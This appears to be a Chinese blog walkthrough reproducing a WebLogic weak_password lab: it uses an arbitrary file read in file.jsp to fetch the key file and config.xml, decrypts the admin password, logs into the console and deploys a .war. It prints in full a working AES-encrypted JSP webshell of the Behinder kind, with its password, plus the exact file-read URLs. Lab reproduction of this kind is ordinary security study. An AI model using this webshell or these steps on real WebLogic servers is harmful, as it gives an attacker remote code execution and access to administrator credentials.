Weblogic(weak_password)任意文件读取、口令破解、文件上传 漏洞复现

Weblogic(weak_password)任意文件读取、口令破解、文件上传 漏洞复现

漏洞形成原因

• 本环境存在 任意文件读取漏洞，可利用此漏洞配合解密工具得到登陆密码
• 登录后台后存在上传点，可上传一句话拿shell

漏洞如何利用

• 任意文件读取

http://172.16.2.174:7001/hello/file.jsp?path= #接文件路径

• 上传一句话拿shell

漏洞复现过程

• Kali docker 容器中启动此漏洞环境
  

任意文件读取

• weblogic密码使用AES（老版本3DES）加密，对称加密可解密，只需要找到用户的密文与加密时的密钥即可；
• 这两个文件均位于base_domain下，名为SerializedSystemIni.dat和config.xml；
• SerializedSystemIni.dat是一个二进制文件，所以一定要用burpsuite来读取，用浏览器直接下载可能引入一些干扰字符。在burp里选中读取到的那一串乱码，这就是密钥，右键copy to file就可以保存成一个文件：

172.16.2.174:7001/hello/file.jsp?path=security/SerializedSystemIni.dat

• 再抓取 config.xml 的包，找到加密后的管理员密码：

172.16.2.174:7001/hello/file.jsp?path=config/config.xml

解密

• 解密工具在我的博客的资源里面可下载，或者去 https://github.com/TideSec/Decrypt_Weblogic_Password 可下载。
• 解密工具利用

• 访问 172.16.2.174:7001/console/login/LoginForm.jsp 账号输入：weblogic ，密码是上面的解密密码，注意O的大小写。

• 登录后点击左边的 部署
  

• 点击下面的安装
  

• 点击上载文件
  
  

• 上传的文件是 .war文件，可将一句话写在 666.jsp 中，再将 666.jsp 压缩成 666.zip ，再将666.zip改名为 666.war。

• 一句话木马如下，密码为 pass

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

• 访问 172.16.2.174:7001/666/666.jsp
• 上冰蝎
  
• 漏洞复现成功
  参考文章：https://blog.csdn.net/qq_41954384/article/details/103831122
  技术萌新，还请各位大牛多多指点！